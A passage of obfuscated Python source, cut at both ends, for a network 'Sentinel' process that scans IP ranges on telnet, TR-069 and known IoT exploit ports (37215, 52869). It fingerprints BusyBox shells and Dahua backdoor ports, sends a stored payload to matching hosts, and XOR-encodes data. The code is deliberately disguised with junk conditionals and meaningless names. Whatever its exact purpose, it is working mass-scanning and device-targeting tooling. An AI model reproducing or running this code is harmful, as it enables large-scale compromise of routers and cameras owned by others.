   O0 = IiI1iIIiI1I . recv ( 512 )
8578
  except :
8579
   pass
8580
   if 89 - 89: i1IIi1i1iiI + Oo0 - Oooo - O0oo0OOOOO00
8581
  try :
8582
   for ii1iI1ii in re . findall ( '\xff\xfd.' , O0 ) :
8583
    IiI1iIIiI1I . send ( '\xff\xfc' + ii1iI1ii [ 2 ] )
8584
   for oo0OOO0OOoOO in re . findall ( '\xff\xfb.' , O0 ) :
8585
    IiI1iIIiI1I . send ( '\xff\xfe' + oo0OOO0OOoOO [ 2 ] )
8586
  except :
8587
   pass
8588
  if O0 :
8589
   if 68 - 68: Oo0Oo
8590
   if not i1I1I11iii1i in O0OO0O00000 or O0OO0O00000 [ i1I1I11iii1i ] != 3 :
8591
    oO0iIiiiii1 [ hash ( i11I11III1iii [ i1I1I11iii1i ] ) ] = 1
8592
   O0OO0O00000 [ i1I1I11iii1i ] = 3
8593
   if 99 - 99: OOooOO0 + IIiIIiIii1I
8594
   O0 = re . sub ( '\r?\n' , ';' , O0 )
8595
   O0 = re . sub ( '[^A-Za-z0-9 \.,:;<>\(\)\[\]\-+%!@/#$=]' , '' , O0 )
8596
   if i1I1I11iii1i in i1II and not i1II [ i1I1I11iii1i ] == None :
8597
    i1II [ i1I1I11iii1i ] += O0
8598
   else :
8599
    i1II [ i1I1I11iii1i ] = O0
8600
    if 21 - 21: i1 - IIiIii1iI . O0oo0OOOOO00 % oOOo0000o * Oooo
8601
   if not i1I1I11iii1i in OooO or OooO [ i1I1I11iii1i ] == None :
8602
    if ( re . search ( 'BusyBox v.*#' , i1II [ i1I1I11iii1i ] ) and not 'OpenWrt' in i1II [ i1I1I11iii1i ] ) or 'shell: ' in i1II [ i1I1I11iii1i ] :
8603
     O0OOOo0oOo = int ( i11I11III1iii [ i1I1I11iii1i ] . split ( ':' ) [ 1 ] ) ;
8604
     if O0OOOo0oOo == 6789 or O0OOOo0oOo == 19058 :
8605
      OooO [ i1I1I11iii1i ] = "DahuaBackdoor"
8606
     else :
8607
      OooO [ i1I1I11iii1i ] = "BusyBox"
8608
     try :
8609
      if 87 - 87: oOOoO00oo0 / oOoO0Ooo - Oo0Oo . oOoO0Ooo + oOOo0000o - i1IIi1i1iiI
8610
      IiI1iIIiI1I . send ( ii11II )
8611
      if 9 - 9: Oo0Oo % O0oo . oOOoO00oo0 . o0ooO . IIiIIiIii1I + OOOoOooO
8612
     except :
8613
      pass
8614
     O000O0o0oOOo [ i1I1I11iii1i ] = time . time ( )
8615
     if 95 - 95: OOOoOooO * OOooOO0 % Ii11i1iIi
8616
   IIiI1ii = 512
8617
   if i1I1I11iii1i in OooO and not OooO [ i1I1I11iii1i ] == None :
8618
    IIiI1ii = 2560
8619
   if len ( i1II [ i1I1I11iii1i ] ) >= IIiI1ii :
8620
    i111 ( IiI1iIIiI1I )
8621
  else :
8622
   if 13 - 13: Ii % Oooo - IIiIIiIii1I - O0oo0OOOOO00 . Oooo
8623
   if 85 - 85: IIiIIiIii1I % o0ooO
8624
   if i1I1I11iii1i in O0OO0O00000 and O0OO0O00000 [ i1I1I11iii1i ] == 1 :
8625
    if Iioo0OooOoO - O000O0o0oOOo [ i1I1I11iii1i ] > O0OoO0O :
8626
     O0OO0O00000 [ i1I1I11iii1i ] = 2 ;
8627
     o0oO0o0ooo00 = i11I11III1iii [ i1I1I11iii1i ] . split ( ':' ) [ 0 ] ;
8628
     try :
8629
      IiI1iIIiI1I . send ( 'GET / HTTP/1.1\r\nHost: %s\r\n\r\n' % ( o0oO0o0ooo00 ) )
8630
     except :
8631
      pass
8632
   if ( Iioo0OooOoO - O000O0o0oOOo [ i1I1I11iii1i ] > I1i11II ) :
8633
    if 30 - 30: oOOo0000o - O0oo0OOOOO00 . IIiIIiIii1I + i1 * IIiIii1iI % Ii
8634
    i111 ( IiI1iIIiI1I )
8635
    if 20 - 20: O0oo0OOOOO00
8636
    if 38 - 38: oOOoO00oo0 / Oo0 + IIiII / Ii / O0oo - Ii
8637
    if 65 - 65: I11I1Ii + oOoO0Ooo
8638
def Iii1iIi1i ( data , key , encode = False , decode = False ) :
8639
 if 60 - 60: O0oo + OOooOO0 / O0oo - o0ooO
8640
 if 74 - 74: IIiII * oOoO0Ooo % OOooOO0
8641
 if 58 - 58: oOoO0Ooo . Oo0Oo % IIiIIiIii1I + i1 - OOooOO0
8642
 if 44 - 44: Ii11i1iIi + O0oo0OOOOO00 . Ii / O0oo
8643
 if decode :
8644
  data = binascii . a2b_base64 ( data )
8645
 i1i1IiIiIiii1iiiI = '' . join ( chr ( ord ( x ) ^ ord ( y ) ) for ( x , y ) in izip ( data , cycle ( key ) ) )
8646
 if encode :
8647
  return binascii . b2a_base64 ( i1i1IiIiIiii1iiiI ) . strip ( )
8648
 return i1i1IiIiIiii1iiiI
8649
 if 52 - 52: Oo0Oo . Oooo
8650
def IiiIi1111 ( ) :
8651
 global I1i11IIii1iI1i1
8652
 global I1IiiIiii111I
8653
 if 8 - 8: Ii11i1iIi + i1IIi1i1iiI % oOOoO00oo0 - i1 - Ii % OOOoOooO
8654
 Iioo0OooOoO = time . time ( )
8655
 if 2 - 2: O0oo0OOOOO00 * OOOoOooO % Oo0 . OOooOO0 + Ii11i1iIi * IIiIii1iI
8656
 if 82 - 82: IIiIIiIii1I + I11I1Ii
8657
 Ii111i11iIi ( "STAT V: %d SCT: %d RSQ: %d BFJ: %d WPT: %d PUT: %d TRT: %d XMP: %d" % ( I1IiI1I1 , len ( ii1o00 ) , len ( Oo0Oooo ) , len ( ooooo0OOo0o ) , len ( O000oo0 ) , int ( Iioo0OooOoO - I1i11IIii1iI1i1 ) , len ( iii11II1I1I ) , len ( iIIiii11Ii1 ) ) )
8658
 if 40 - 40: O0oo - o0ooO - OOOoOooO % i1IIi1i1iiI
8659
 I1i11 = False
8660
 try :
8661
  if os . path . isfile ( '/tmp/system/update/sentinel.reload' ) :
8662
   I1i11 = True
8663
   os . remove ( '/tmp/system/update/sentinel.reload' )
8664
 except :
8665
  pass
8666
  if 33 - 33: oOOoO00oo0
8667
 ii = False
8668
 if 59 - 59: i1IIi1i1iiI . oOoO0Ooo * IIiIIiIii1I / Ii11i1iIi . oOOo0000o * I11I1Ii
8669
 if Iioo0OooOoO - I1i11IIii1iI1i1 > ( 17 * 3600 ) and len ( ii1o00 ) < 300 and len ( ooooo0OOo0o ) == 0 and len ( O000oo0 ) == 0 and len ( iii11II1I1I ) == 0 :
8670
  if 99 - 99: Ii11i1iIi
8671
  Ii111i11iIi ( 'NOTC: 17h process restart' )
8672
  ii = True
8673
  if 14 - 14: oOOo0000o - i1 - i1 . oOOoO00oo0 . oOOo0000o - O0oo
8674
 if ii :
8675
  if 72 - 72: Oooo
8676
  for iI11i1i1iiI in O0oO0ooooOO :
8677
   try :
8678
    iI11i1i1iiI . close ( )
8679
   except :
8680
    pass
8681
  sys . exit ( 0 )
8682
  if 76 - 76: oOoO0Ooo / IIiIii1iI + O0oo
8683
 if I1i11 :
8684
  Ii111i11iIi ( 'NOTC: Sentinel reloading config.' )
8685
  Oo000o0OOOo ( '/tmp/system/control.cfg' )
8686
  if 67 - 67: oOoO0Ooo - oOoO0Ooo - oOoO0Ooo / Ii
8687
  if 95 - 95: IIiIii1iI
8688
  if 30 - 30: Ii11i1iIi / Ii11i1iIi * Oo0Oo / O0oo
8689
 O00oOo = 0
8690
 try :
8691
  IiIII1iiiI1ii = os . listdir ( '/tmp/system/update' )
8692
  for file in IiIII1iiiI1ii :
8693
   Oo00oO0O = re . search ( '^sentinel\.jobreq\.SCN\.(\S+)\.(\d+\.\d+\.\d+\.)(\d+)\-(\d+)' , file )
8694
   if Oo00oO0O :
8695
    if I1IiiIiii111I > 2100 :
8696
     O00Oo0oOO0O = Oo00oO0O . group ( 1 )
8697
     iIIiII1i1 = Oo00oO0O . group ( 2 )
8698
     IiI1iIiII1 = int ( Oo00oO0O . group ( 3 ) )
8699
     oOO0 = int ( Oo00oO0O . group ( 4 ) )
8700
     Ii111i11iIi ( "NOTC: SCN ref %s for range %s%d - %s%d" % ( O00Oo0oOO0O , iIIiII1i1 , IiI1iIiII1 , iIIiII1i1 , oOO0 ) )
8701
     os . remove ( '/tmp/system/update/' + file )
8702
     for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) :
8703
      oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI )
8704
      iII1I1I ( oOo00OoOO0oo , 1 )
8705
     break
8706
    else :
8707
     Ii111i11iIi ( "NOTC: Skipping SCN due to low system RAM %d" % ( I1IiiIiii111I ) )
8708
     O00oOo += 1
8709
   Oo00oO0O = re . search ( '^sentinel\.jobreq\.SCN\.(\S+)\.(\d+\.\d+\.\d+\.\d+)' , file )
8710
   if Oo00oO0O :
8711
    O00Oo0oOO0O = Oo00oO0O . group ( 1 )
8712
    oOo00OoOO0oo = Oo00oO0O . group ( 2 )
8713
    Ii111i11iIi ( "NOTC: SCN ref %s for ip %s" % ( O00Oo0oOO0O , oOo00OoOO0oo ) )
8714
    os . remove ( '/tmp/system/update/' + file )
8715
    iII1I1I ( oOo00OoOO0oo , 1 )
8716
    continue
8717
   Oo00oO0O = re . search ( '^sentinel\.jobreq\.SCP\.(\S+)\.(\d+)_(\d+\.\d+\.\d+\.)(\d+)\-(\d+)' , file )
8718
   if Oo00oO0O :
8719
    O00Oo0oOO0O = Oo00oO0O . group ( 1 )
8720
    oo0OOOo00oOOO0OO = int ( Oo00oO0O . group ( 2 ) )
8721
    iIIiII1i1 = Oo00oO0O . group ( 3 )
8722
    IiI1iIiII1 = int ( Oo00oO0O . group ( 4 ) )
8723
    oOO0 = int ( Oo00oO0O . group ( 5 ) )
8724
    Ii111i11iIi ( "NOTC: SCP ref %s for range %s%d - %s%d port %d" % ( O00Oo0oOO0O , iIIiII1i1 , IiI1iIiII1 , iIIiII1i1 , oOO0 , oo0OOOo00oOOO0OO ) )
8725
    os . remove ( '/tmp/system/update/' + file )
8726
    if 24 - 24: OOOoOooO
8727
    if oo0OOOo00oOOO0OO == 1 :
8728
     for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) :
8729
      oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI )
8730
      IIii1IIi1I ( oOo00OoOO0oo , 23 )
8731
      IIii1IIi1I ( oOo00OoOO0oo , 80 )
8732
      IIii1IIi1I ( oOo00OoOO0oo , 7547 )
8733
      IIii1IIi1I ( oOo00OoOO0oo , 9527 )
8734
      IIii1IIi1I ( oOo00OoOO0oo , 37215 )
8735
      IIii1IIi1I ( oOo00OoOO0oo , 52869 )
8736
    elif oo0OOOo00oOOO0OO == 2 :
8737
     for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) :
8738
      oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI )
8739
      IIii1IIi1I ( oOo00OoOO0oo , 23 )
8740
      IIii1IIi1I ( oOo00OoOO0oo , 80 )
8741
      IIii1IIi1I ( oOo00OoOO0oo , 81 )
8742
      IIii1IIi1I ( oOo00OoOO0oo , 8080 )
8743
      IIii1IIi1I ( oOo00OoOO0oo , 7547 )
8744
      IIii1IIi1I ( oOo00OoOO0oo , 5555 )
8745
      IIii1IIi1I ( oOo00OoOO0oo , 37215 )
8746
      IIii1IIi1I ( oOo00OoOO0oo , 52869 )
8747
    elif oo0OOOo00oOOO0OO == 3 :
8748
     for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) :
8749
      oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI )
8750
      IIii1IIi1I ( oOo00OoOO0oo , 23 )
8751
      IIii1IIi1I ( oOo00OoOO0oo , 80 )
8752
      IIii1IIi1I ( oOo00OoOO0oo , 81 )
8753
      IIii1IIi1I ( oOo00OoOO0oo , 8080 )
8754
      IIii1IIi1I ( oOo00OoOO0oo , 37215 )
8755
      IIii1IIi1I ( oOo00OoOO0oo , 52869 )
8756
    elif oo0OOOo00oOOO0OO == 4 :
8757
     for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) :
8758
      oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI )
8759
      IIii1IIi1I ( oOo00OoOO0oo , 23 )
8760
      IIii1IIi1I ( oOo00OoOO0oo , 60023 )
8761
      IIii1IIi1I ( oOo00OoOO0oo , 4719 )
8762
      IIii1IIi1I ( oOo00OoOO0oo , 80 )
8763
      IIii1IIi1I ( oOo00OoOO0oo , 81 )
8764
      IIii1IIi1I ( oOo00OoOO0oo , 8080 )
8765
      IIii1IIi1I ( oOo00OoOO0oo , 37215 )
8766
      IIii1IIi1I ( oOo00OoOO0oo , 52869 )
8767
    elif oo0OOOo00oOOO0OO == 5 :
8768
     for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) :
8769
      oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI )
8770
      IIii1IIi1I ( oOo00OoOO0oo , 80 )
8771
      IIii1IIi1I ( oOo00OoOO0oo , 81 )
8772
      IIii1IIi1I ( oOo00OoOO0oo , 82 )
8773
      IIii1IIi1I ( oOo00OoOO0oo , 88 )
8774
      IIii1IIi1I ( oOo00OoOO0oo , 8080 )
8775
      IIii1IIi1I ( oOo00OoOO0oo , 8081 )
8776
      IIii1IIi1I ( oOo00OoOO0oo , 8181 )
8777
      IIii1IIi1I ( oOo00OoOO0oo , 8888 )
8778
      IIii1IIi1I ( oOo00OoOO0oo , 37215 )
8779
      IIii1IIi1I ( oOo00OoOO0oo , 52869 )
8780
    elif oo0OOOo00oOOO0OO == 6 :
8781
     for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) :
8782
      oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI )
8783
      IIii1IIi1I ( oOo00OoOO0oo , 23 )
8784
      IIii1IIi1I ( oOo00OoOO0oo , 2323 )
8785
      IIii1IIi1I ( oOo00OoOO0oo , 23231 )
8786
      IIii1IIi1I ( oOo00OoOO0oo , 23123 )
8787
      IIii1IIi1I ( oOo00OoOO0oo , 5358 )
8788
      IIii1IIi1I ( oOo00OoOO0oo , 6789 )
8789
      IIii1IIi1I ( oOo00OoOO0oo , 8023 )
8790
      IIii1IIi1I ( oOo00OoOO0oo , 60023 )
8791
      IIii1IIi1I ( oOo00OoOO0oo , 4719 )
8792
      IIii1IIi1I ( oOo00OoOO0oo , 9527 )
8793
      IIii1IIi1I ( oOo00OoOO0oo , 37215 )
8794
      IIii1IIi1I ( oOo00OoOO0oo , 52869 )
8795
    elif oo0OOOo00oOOO0OO == 7 :
8796
     for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) :
8797
      oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI )
8798
      IIii1IIi1I ( oOo00OoOO0oo , 23 )
8799
      IIii1IIi1I ( oOo00OoOO0oo , 8023 )
8800
      IIii1IIi1I ( oOo00OoOO0oo , 80 )
8801
      IIii1IIi1I ( oOo00OoOO0oo , 81 )
8802
      IIii1IIi1I ( oOo00OoOO0oo , 8080 )
8803
      IIii1IIi1I ( oOo00OoOO0oo , 8000 )
8804
      IIii1IIi1I ( oOo00OoOO0oo , 90 )
8805
      IIii1IIi1I ( oOo00OoOO0oo , 9000 )
8806
      IIii1IIi1I ( oOo00OoOO0oo , 37215 )
8807
      IIii1IIi1I ( oOo00OoOO0oo , 52869 )
8808
    elif oo0OOOo00oOOO0OO == 9 :
8809
     for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) :
8810
      oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI )
8811
      IIii1IIi1I ( oOo00OoOO0oo , 23 )
8812
      IIii1IIi1I ( oOo00OoOO0oo , 80 )
8813
      IIii1IIi1I ( oOo00OoOO0oo , 81 )
8814
      IIii1IIi1I ( oOo00OoOO0oo , 8080 )
8815
      IIii1IIi1I ( oOo00OoOO0oo , 7547 )
8816
      IIii1IIi1I ( oOo00OoOO0oo , 5555 )
8817
      IIii1IIi1I ( oOo00OoOO0oo , random . randint ( 1 , 65535 ) )
8818
      IIii1IIi1I ( oOo00OoOO0oo , 37215 )
8819
      IIii1IIi1I ( oOo00OoOO0oo , 52869 )
8820
    elif oo0OOOo00oOOO0OO == 10 :
8821
     for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) :
8822
      oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI )
8823
      IIii1IIi1I ( oOo00OoOO0oo , 23 )
8824
      IIii1IIi1I ( oOo00OoOO0oo , 80 )
8825
      IIii1IIi1I ( oOo00OoOO0oo , 81 )
8826
      IIii1IIi1I ( oOo00OoOO0oo , 8080 )
8827
      IIii1IIi1I ( oOo00OoOO0oo , random . randint ( 1 , 65535 ) )
8828
      IIii1IIi1I ( oOo00OoOO0oo , random . randint ( 1 , 65535 ) )
8829
      IIii1IIi1I ( oOo00OoOO0oo , random . randint ( 1 , 65535 ) )
8830
      IIii1IIi1I ( oOo00OoOO0oo , random . randint ( 1 , 65535 ) )
8831
      IIii1IIi1I ( oOo00OoOO0oo , random . randint ( 1 , 65535 ) )
8832
      IIii1IIi1I ( oOo00OoOO0oo , random . randint ( 1 , 65535 ) )
8833
      IIii1IIi1I ( oOo00OoOO0oo , 37215 )
8834
      IIii1IIi1I ( oOo00OoOO0oo , 52869 )
8835
    elif oo0OOOo00oOOO0OO == 11 :
8836
     for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) :
8837
      oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI )
8838
      IIii1IIi1I ( oOo00OoOO0oo , 23 )
8839
      IIii1IIi1I ( oOo00OoOO0oo , 80 )
8840
      IIii1IIi1I ( oOo00OoOO0oo , 81 )
8841
      IIii1IIi1I ( oOo00OoOO0oo , 82 )
8842
      IIii1IIi1I ( oOo00OoOO0oo , 8080 )
8843
      IIii1IIi1I ( oOo00OoOO0oo , 7547 )
8844
      IIii1IIi1I ( oOo00OoOO0oo , 8023 )
8845
      IIii1IIi1I ( oOo00OoOO0oo , 60023 )
8846
      IIii1IIi1I ( oOo00OoOO0oo , 23231 )
8847
      IIii1IIi1I ( oOo00OoOO0oo , 9527 )
8848
      IIii1IIi1I ( oOo00OoOO0oo , random . randint ( 1 , 65535 ) )
8849
      IIii1IIi1I ( oOo00OoOO0oo , 37215 )
8850
      IIii1IIi1I ( oOo00OoOO0oo , 52869 )
8851
    elif oo0OOOo00oOOO0OO == 12 :
8852
     for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) :
8853
      oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI )
8854
      IIii1IIi1I ( oOo00OoOO0oo , 23 )
8855
      IIii1IIi1I ( oOo00OoOO0oo , 80 )
8856
      IIii1IIi1I ( oOo00OoOO0oo , 81 )
8857
      IIii1IIi1I ( oOo00OoOO0oo , 82 )
8858
      IIii1IIi1I ( oOo00OoOO0oo , 8080 )
8859
      IIii1IIi1I ( oOo00OoOO0oo , 8023 )
8860
      IIii1IIi1I ( oOo00OoOO0oo , 60023 )
8861
      IIii1IIi1I ( oOo00OoOO0oo , 23231 )
8862
      IIii1IIi1I ( oOo00OoOO0oo , random . randint ( 1 , 65535 ) )
8863
      IIii1IIi1I ( oOo00OoOO0oo , 37215 )
8864
      IIii1IIi1I ( oOo00OoOO0oo , 52869 )
8865
    elif oo0OOOo00oOOO0OO == 13 :
8866
     for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) :
8867
      oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI )
8868
      IIii1IIi1I ( oOo00OoOO0oo , 23 )
8869
      IIii1IIi1I ( oOo00OoOO0oo , 2323 )
8870
      IIii1IIi1I ( oOo00OoOO0oo , 80 )
8871
      IIii1IIi1I ( oOo00OoOO0oo , 81 )
8872
      IIii1IIi1I ( oOo00OoOO0oo , 8080 )
8873
      IIii1IIi1I ( oOo00OoOO0oo , 7547 )
8874
      IIii1IIi1I ( oOo00OoOO0oo , 37215 )
8875
      IIii1IIi1I ( oOo00OoOO0oo , 52869 )
8876
    else :
8877
     for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) :
8878
      oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI )
8879
      IIii1IIi1I ( oOo00OoOO0oo , oo0OOOo00oOOO0OO )
8880
    break
8881
   else :
8882
    Oo00oO0O = re . search ( '^sentinel\.jobreq\.SCP\.(\S+)\.(\d+)_(\d+\.\d+\.\d+\.\d+)' , file )
8883
    if Oo00oO0O :
8884
     O00Oo0oOO0O = Oo00oO0O . group ( 1 )
8885
     oo0OOOo00oOOO0OO = int ( Oo00oO0O . group ( 2 ) )
8886
     oOo00OoOO0oo = Oo00oO0O . group ( 3 )
8887
     Ii111i11iIi ( "NOTC: SCP ref %s for ip %s port %d" % ( O00Oo0oOO0O , oOo00OoOO0oo , oo0OOOo00oOOO0OO ) )
8888
     os . remove ( '/tmp/system/update/' + file )
8889
     IIii1IIi1I ( oOo00OoOO0oo , oo0OOOo00oOOO0OO )
8890
     continue
8891
 except :
8892
  pass
8893
  if 49 - 49: Oo0Oo * oOOo0000o * Oooo + oOOoO00oo0 . IIiIii1iI / oOOoO00oo0
8894
 if O00oOo >= 3 :
8895
  Ii111i11iIi ( "ERR: Backlog of %d scans due to low RAM %d" % ( O00oOo , I1IiiIiii111I ) )
8896
  if 28 - 28: IIiII
8897
  if 89 - 89: I11I1Ii % O0oo * Ii11i1iIi
8898
  if 75 - 75: IIiIii1iI / i1 / OOOoOooO . O0oo0OOOOO00 * Oooo / Oo0Oo
8899
  if 77 - 77: Oooo
8900
  if 8 - 8: OOOoOooO / IIiII
8901
time . sleep ( 3 )
8902
if 89 - 89: Ii % IIiII - i1 * o0oooooO . Ii11i1iIi
8903
if 41 - 41: i1
8904
if 87 - 87: IIiIii1iI - Oo0Oo + oOOoO00oo0 + O0oo0OOOOO00 . O0oo0OOOOO00
8905
OOOoooO0 = 0
8906
iii1iiI111ii = False
8907
for Ooo0o0oOO0o in II1I1i11 :
8908
 O0O0 = socket . socket ( socket . AF_INET , socket . SOCK_STREAM )
8909
 O0O0 . setsockopt ( socket . SOL_SOCKET , socket . SO_REUSEADDR , 1 )
8910
 try :
8911
  O0O0 . bind ( ( '0.0.0.0' , int ( Ooo0o0oOO0o ) ) )
8912
  O0O0 . listen ( 5 )
8913
  O0oO0ooooOO . append ( O0O0 )
8914
  Iiii [ int ( Ooo0o0oOO0o ) ] = O0O0
8915
  OOOoooO0 += 1
8916
 except :
8917
  pass
8918
  if 11 - 11: Oooo
8919
  if 79 - 79: OOooOO0 / O0oo0OOOOO00 - Oo0
8920
Ii111i11iIi ( "Sentinel Process Launch (%d listeners)" % ( OOOoooO0 ) )
8921
if 67 - 67: i1IIi1i1iiI + oOOo0000o
8922
if 100 - 100: i1 + Oo0Oo - i1 / Oo0 * i1IIi1i1iiI
8923
if 70 - 70: I11I1Ii + Ii * IIiIii1iI % O0oo0OOOOO00 . O0oo0OOOOO00
8924
if 30 - 30: Oo0Oo - i1 . Oo0
8925
if 11 - 11: oOOo0000o * OOOoOooO * oOOo0000o / i1IIi1i1iiI
8926
if 30 - 30: IIiII / i1IIi1i1iiI * oOOoO00oo0
8927
if 8 - 8: OOooOO0 + oOOo0000o * Oooo
8928
if 96 - 96: i1 + oOoO0Ooo
8929
if 96 - 96: i1
8930
if 5 - 5: IIiIIiIii1I
8931
if 26 - 26: O0oo0OOOOO00 % i1 - o0ooO / Oooo + O0oo0OOOOO00
8932
if 1 - 1: oOoO0Ooo % o0oooooO - I11I1Ii * IIiII + I11I1Ii
8933
if 10 - 10: Oooo + Oooo / Oo0Oo
8934
if 66 - 66: Oo0Oo * Ii11i1iIi
8935
i1I1oooo0oOooo = time . time ( )
8936
Ii1i1iI1IiI = 0
8937
O00oO0OOoOo = time . time ( )
8938
o0o0o00oooOoo = time . time ( )
8939
if 70 - 70: OOooOO0 * O0oo % OOOoOooO . oOOoO00oo0
8940
while True :
8941
 ii1IIIi1 ( )
8942
 if 91 - 91: o0oooooO / O0oo0OOOOO00 * IIiII + O0oo0OOOOO00 . OOooOO0 + oOoO0Ooo
8943
 Iioo0OooOoO = time . time ( )
8944
 OoOO0Oo ( )
8945
 OOO0000OO0oO0 ( )
8946
 OooOo0o0oO0 ( )
8947
 oOOoOO ( )
8948
 O00o0oOOO0O0 ( )
8949
 Ooo0OO ( )
8950
 IIi1IIIIIi ( )
8951
 iI11IiI1 ( )
8952
 Oo0Oo0o ( )
8953
 IIiI1i , O0o0 , IiIIiI11I = select . select ( O0oO0ooooOO , [ ] , [ ] , 0.01 )
8954
 for iI11i1i1iiI in IIiI1i :
8955
  try :
8956
   III1 , Ii1ii1II1I = iI11i1i1iiI . accept ( )
8957
  except :
8958
   continue
8959
  oOoOo0oooo , ii1i1I = Ii1ii1II1I
8960
  iiIi1I1 = hash ( oOoOo0oooo )
8961
  if iiIi1I1 in I1I1I11 :
8962
   try :
8963
    III1 . close ( )
8964
   except :
8965
    pass
8966
    if 59 - 59: o0oooooO
8967
   continue
8968
  I1I1I11 [ iiIi1I1 ] = 1
8969
  OOOoo0 , Oo0o = III1 . getsockname ( )
8970
  if Oo0o in i11 :
8971
   if 82 - 82: Ii11i1iIi % i1IIi1i1iiI % Oo0Oo * IIiII
8972
   oOo00o . append ( III1 )
8973
   iIIiii = hash ( III1 )
8974
   O0oOo [ iIIiii ] = '%s:%d>%s:%d' % ( oOoOo0oooo , ii1i1I , OOOoo0 , Oo0o )
8975
  else :
8976
   if i111IIIiII1i :
8977
    Ii111i11iIi ( '%s:%d>%s:%d TN' % ( oOoOo0oooo , ii1i1I , OOOoo0 , Oo0o ) )
8978
   iII1I1I ( oOoOo0oooo , Oo0o )
8979
   O00000O ( oOoOo0oooo , Oo0o )
8980
   if 75 - 75: i1 . O0oo0OOOOO00 * OOooOO0 . i1IIi1i1iiI
8981
   if Ii1IIi1iI1i1I == 1 and ( Oo0o == 23 or Oo0o == 2323 ) :
8982
    OOo0OoooO ( III1 , oOoOo0oooo , Oo0o )
8983
   else :
8984
    try :
8985
     III1 . close ( )
8986
    except :
8987
     pass
8988
 IIiI1i , O0o0 , IiIIiI11I = select . select ( oOo00o , [ ] , [ ] , 0.01 )
8989
 for I1 in IIiI1i :
8990
  O0 = O0OO0 ( I1 , 1 )
8991
  iIIiii = hash ( I1 )
8992
  if O0 :
8993
   if re . search ( 'mips-unknown-linux-gnu' , O0 ) :
8994
    Ii111i11iIi ( "%s MF" % ( O0oOo [ iIIiii ] ) )
8995
    iIi1I11 = O0oOo [ iIIiii ] . split ( ':' )
8996
    if 87 - 87: Ii / Oo0Oo
8997
    iII1I1I ( iIi1I11 [ 0 ] , int ( iIi1I11 [ 2 ] ) )
8998
    O00000O ( iIi1I11 [ 0 ] , 80 )
8999
  try :
9000
   I1 . close ( )
9001
  except :
9002
   pass
9003
  oOo00o . remove ( I1 )
9004
  O0oOo [ iIIiii ] = None
9005
  if 71 - 71: oOOoO00oo0 / O0oo . Ii11i1iIi . O0oo / Ii11i1iIi
9006
 if Iioo0OooOoO - i1I1oooo0oOooo > 3 :
9007
  iIiiIi = min ( max ( len ( ii1o00 ) / 100 , 3 ) , 30 )
9008
  if 80 - 80: O0oo / i1 * Oooo / OOooOO0 + O0oo0OOOOO00
9009
  for O0OooO0Oo0O in range ( iIiiIi ) :
9010
   oo0OO0ooo0 ( )
9011
  O0oOoo0000 ( )
9012
  i1I1oooo0oOooo = Iioo0OooOoO
9013
 if Iioo0OooOoO - Ii1i1iI1IiI > 300 :
9014
  IiiIi1111 ( )
9015
  if 53 - 53: Oo0 - Oo0 . oOOoO00oo0
9016
  if i1IIOO0OOoO00OO == 0 and len ( ii1o00 ) == 0 :
9017
   o0o0oOOo = [ ]
9018
   oO0iIiiiii1 = { }
9019
   i11I11III1iii = { }
9020
   O0OO0O00000 = { }
9021
   O000O0o0oOOo = { }
9022
   i1II = { }
9023
   ii1o00 = [ ]
9024
  if len ( IiIIiI1iII1Ii ) :
9025
   if 91 - 91: o0ooO
9026
   IiI1Iiii = [ ]
9027
   for iiIiiIi1Ii1 in Oo0Oooo :
9028
    oooOo0o = 0
9029
    for I1iiiiI in IiIIiI1iII1Ii :
9030
     if I1iiiiI [ 0 ] == iiIiiIi1Ii1 [ 1 ] and int ( I1iiiiI [ 1 ] ) == int ( iiIiiIi1Ii1 [ 2 ] ) :
9031
      if 51 - 51: OOOoOooO % Ii11i1iIi % oOoO0Ooo * Oo0 * IIiIii1iI
9032
      oooOo0o = 1
9033
      break
9034
    if not oooOo0o :
9035
     IiI1Iiii . append ( iiIiiIi1Ii1 )
9036
   Oo0Oooo = IiI1Iiii
9037
   IiIIiI1iII1Ii = [ ]
9038
   if 6 - 6: O0oo0OOOOO00 / O0oo0OOOOO00 * IIiIii1iI * IIiIIiIii1I
9039
  if iii1iiI111ii :
9040
   if 14 - 14: oOoO0Ooo + Ii . oOOo0000o / IIiII - I11I1Ii
9041
   o0o0Ooo = { }
9042
   for iiIiiIi1Ii1 in Oo0Oooo :
9043
    o0o0Ooo [ hash ( iiIiiIi1Ii1 [ 1 ] ) ] = 1
9044
    if 95 - 95: oOoO0Ooo / I11I1Ii % IIiII - oOOoO00oo0 * o0oooooO
9045
   oO0OoOoO00OoO = o0o0Ooo
9046
   if 72 - 72: o0ooO % IIiIii1iI / O0oo . Oo0Oo * oOoO0Ooo
9047
   iii1iiI111ii = False
9048
  OOO000oOOooOO = III111I1 ( time . time ( ) )
9049
  for iiIiiIi1Ii1 in OOO000oOOooOO :
9050
   Oo0oOOooO0 = iiIiiIi1Ii1 [ 1 ]
9051
   iII111iI = int ( iiIiiIi1Ii1 [ 2 ] )
9052
